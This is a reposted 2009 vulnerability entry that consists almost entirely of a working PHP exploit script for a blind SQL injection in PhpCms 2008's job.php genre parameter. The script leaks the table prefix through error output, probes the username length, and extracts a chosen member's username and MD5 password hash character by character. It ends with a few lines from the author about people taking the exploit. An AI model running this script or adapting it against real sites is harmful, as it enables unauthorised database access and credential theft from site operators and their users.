phpcms 0day+EXP-vulnerability warning-the black bar safety net

2009-09-21T00:00:00
ID MYHACK58:62200924729
Type myhack58
Reporter 佚名
Modified 2009-09-21T00:00:00

Description

Reposted from the author's blog (My5t3ry); the exploit below targets a blind SQL injection in the `genre` parameter of PhpCms 2008's job.php.

So-to me.

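<?php
// PhpCms 2008 job.php $genre blind SQL injection client (CLI).
// Usage: php <script> <hostname> <path> <userid>
// Run only against systems you are authorised to test.
// NOTE(review): the original used the short "<?" open tag, which is off
// by default in modern PHP configurations; "<?php" always works.

// $argc includes the script name, so three user arguments make four.
if ($argc != 4) usage ();

$hostname = $argv[1];   // target host; also sent as the HTTP Host header
$path     = $argv[2];   // web path of the PhpCms install, e.g. /yp
$userid   = $argv[3];   // <prefix>member.userid whose row is extracted

// Default table prefix; overwritten once the real one has been scraped
// from the target's SQL error output.
$prefix = "phpcms_";

// Cursor state for the blind extraction loops: $pos is the 1-based
// SUBSTRING offset, $chr the index into the candidate character set.
$pos = 1;
$chr = 0;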

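/**
 * Print the banner and command-line usage, then terminate the script.
 *
 * Reads the global $argv only for the script name (argv[0]). Never returns.
 * (The page rendered "$ argv[0]", which PHP parses as a variable-variable
 * and prints nothing useful; restored to $argv[0].)
 */
function usage () {
    global $argv;
    echo "\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit"
       . "\n[+] Author: My5t3ry"
       . "\n[+] Site : <http://hi.baidu.com/netstart>"
       . "\n[+] Usage : php " . $argv[0] . " <hostname> <path> <userid>"
       . "\n[+] Ex. : php " . $argv[0] . " localhost /yp 1"
       . "\n\n";
    exit ();
}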

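/**
 * Send one GET to job.php with the payload in the genre parameter and
 * return the raw HTTP response (status line, headers and body).
 *
 * The other parameters (action=list&inputtime=0&station=4) are fixed;
 * only genre carries attacker data. The value is sent verbatim, so the
 * caller must have URL-encoded it already.
 *
 * @param string $hostname target host, also used for the Host header
 * @param string $path     application path prefix, e.g. "/yp"
 * @param string $query    pre-encoded value for the genre parameter
 * @param int    $port     TCP port, default 80 (plain HTTP only)
 * @return string raw response; dies with the socket error if the
 *                connection cannot be opened
 */
function request ($hostname, $path, $query, $port = 80) {
    $errno  = 0;
    $errstr = '';
    // The original never checked fsockopen(); on a refused connection it
    // fed a boolean to feof()/fgets() and spewed warnings instead of
    // failing clearly. A 10 s connect timeout keeps a dead host from
    // hanging the run.
    $fp = fsockopen ($hostname, $port, $errno, $errstr, 10);
    if ($fp === false) {
        die ("\n[-] Cannot connect to {$hostname}:{$port} - {$errstr} ({$errno})\n");
    }

    $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n"
             . "Host: {$hostname}\r\n"
             . "Connection: Close\r\n\r\n";

    fputs ($fp, $request);

    // Connection: Close lets us read until EOF; $reply is initialised so
    // the concatenation does not start from an undefined variable.
    $reply = '';
    while (!feof ($fp)) {
        $reply .= fgets ($fp, 1024);
    }
    fclose ($fp);
    return $reply;
}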

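/**
 * Boolean oracle: is character $pos of column $fld, in the member row
 * for userid $uid, equal to $chr?
 *
 * Payload (before encoding):
 *   x' OR ASCII(SUBSTRING((SELECT fld FROM <prefix>member
 *        WHERE userid = 'uid'),pos,1))=<ord> OR '1' = '2
 * The trailing "OR '1' = '2" re-balances the application's own closing
 * quote. Spaces go out as %20 and quotes as %2527 (a double-encoded
 * quote); that encoding is evidently what lets the quote reach the SQL
 * layer on the target, so keep it byte-for-byte.
 *
 * A true condition makes job.php list matching rows, visible as a
 * non-empty <span class="c_orange">...</span>; no span, or an empty one,
 * is read as false.
 *
 * @param string $hostname target host
 * @param string $path     application path prefix
 * @param string $uid      member userid being extracted
 * @param string $fld      column name, e.g. "username" or "password"
 * @param string $chr      single candidate character
 * @param int    $pos      1-based SUBSTRING position
 * @return bool true when the oracle reports a match
 */
function exploit ($hostname, $path, $uid, $fld, $chr, $pos) {
    global $prefix;

    // An empty candidate (the original reached this by indexing past the
    // end of its key string) would test ASCII()=0 and can never be the
    // real byte; reject it instead of wasting a request.
    if ($chr === '' || $chr === null) return false;
    $code = ord ($chr);

    $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM " . $prefix . "member WHERE userid = '{$uid}'),{$pos},1))={$code} OR '1' = '2";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%2527", $query);

    $outcode = request ($hostname, $path, $query);

    // Guard the capture: the original read $x[1] even when nothing
    // matched, which only worked by accident (undefined index -> "").
    if (!preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x)) {
        return false;
    }
    return strlen (trim ($x[1])) != 0;
}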

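/**
 * Recover characters $from..$to (1-based) of column $fld for $userid by
 * asking exploit() about each candidate in $key in turn, echoing every
 * character as soon as it is confirmed.
 *
 * A position that matches no candidate prints '?' and moves on. The
 * original loop instead kept incrementing its index past the end of the
 * key string and never terminated (e.g. an uppercase letter or '_' in a
 * username, neither of which is in the candidate set). Probing is linear
 * (up to strlen($key) requests per character); bisecting on ASCII()
 * would need about seven per character if request volume matters.
 *
 * @param string $hostname target host
 * @param string $path     application path prefix
 * @param string $userid   member userid being extracted
 * @param string $fld      column name passed through to exploit()
 * @param string $key      candidate characters, tried in order
 * @param int    $from     first 1-based position
 * @param int    $to       last 1-based position (inclusive)
 * @return string recovered text, '?' for unresolved positions
 */
function crack_column ($hostname, $path, $userid, $fld, $key, $from, $to) {
    $found = '';
    $nkeys = strlen ($key);
    for ($p = $from; $p <= $to; $p++) {
        $hit = '?';
        for ($k = 0; $k < $nkeys; $k++) {
            if (exploit ($hostname, $path, $userid, $fld, $key[$k], $p)) {
                $hit = $key[$k];
                break;
            }
        }
        echo $hit;
        $found .= $hit;
    }
    return $found;
}

// ---------------------------------------------------------------------
// Step 1: learn the table prefix. A bare (double-encoded) quote in genre
// makes job.php print its failing SQL, which names the <prefix>yp_job
// table. The banner echoes below sat after a commented-out "function
// lengthcolumns()" header in the original; they are treated as live.
// ---------------------------------------------------------------------
echo "\n--------------------------------------------------------------------------------\n";
echo "PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo "By My5t3ry (<http://hi.baidu.com/netstart>)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

$outcode = request ($hostname, $path, "x%2527");

// [^`]+ rather than the original greedy .+ so the capture cannot run past
// the first back-quoted table name if "yp_job" appears more than once in
// the page. The original pattern also carried /e, a preg_replace-only
// modifier (rejected outright since PHP 7); it is dropped.
if (preg_match ('/FROM `([^`]+)yp_job/i', $outcode, $match)) {
    $prefix = $match[1];
    echo '[+]Good Job! Wo Got The pre -> ' . $prefix . "\n";
} else {
    die (" Exploit failed...");
}

// ---------------------------------------------------------------------
// Step 2: username length, probed one value at a time with
// length(username)=N. Bounded so a dead oracle (wrong path, filtering,
// unknown userid) cannot spin forever; the page shows the original's
// "$i>20" bail-out on the same line as a commented echo, so the bound
// itself may have been lost.
// ---------------------------------------------------------------------
echo "[~]trying to get username length...\n";
$max_len = 20;
$length  = -1;
for ($i = 0; $i <= $max_len; $i++) {
    $query = "x' OR length((select username from " . $prefix . "member Where userid='{$userid}'))=" . $i . " OR '1'='2";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%2527", $query);
    $outcode = request ($hostname, $path, $query);
    if (preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x)
        && strlen (trim ($x[1])) != 0) {
        $length = $i;
        break;
    }
}
if ($length < 0) die (" Exploit failed...");
echo "[+]length -> " . $length;

// ---------------------------------------------------------------------
// Step 3: extract the row character by character.
// ---------------------------------------------------------------------
echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
// Candidate set is lowercase alphanumerics only; anything else prints '?'.
$username = crack_column ($hostname, $path, $userid, "username", "abcdefghijklmnopqrstuvwxyz0123456789", 1, $length);

echo "\n[+]password(md5) -> ";
// Positions 9..24 are substr(md5, 8, 16), the 16-character MD5 form --
// presumably chosen for hash-lookup services; use 1..32 for the full digest.
$password = crack_column ($hostname, $path, $userid, "password", "abcdef0123456789", 9, 24);

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";
?>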

If you only leave a comment to grab the exploit and go, I will despise and ignore it! Don't do that next time.~

Quite a few people already know about this hole I found, so I don't mind looking back at it and writing it up here.

It looks like he and I will both be putting this hole out in the open.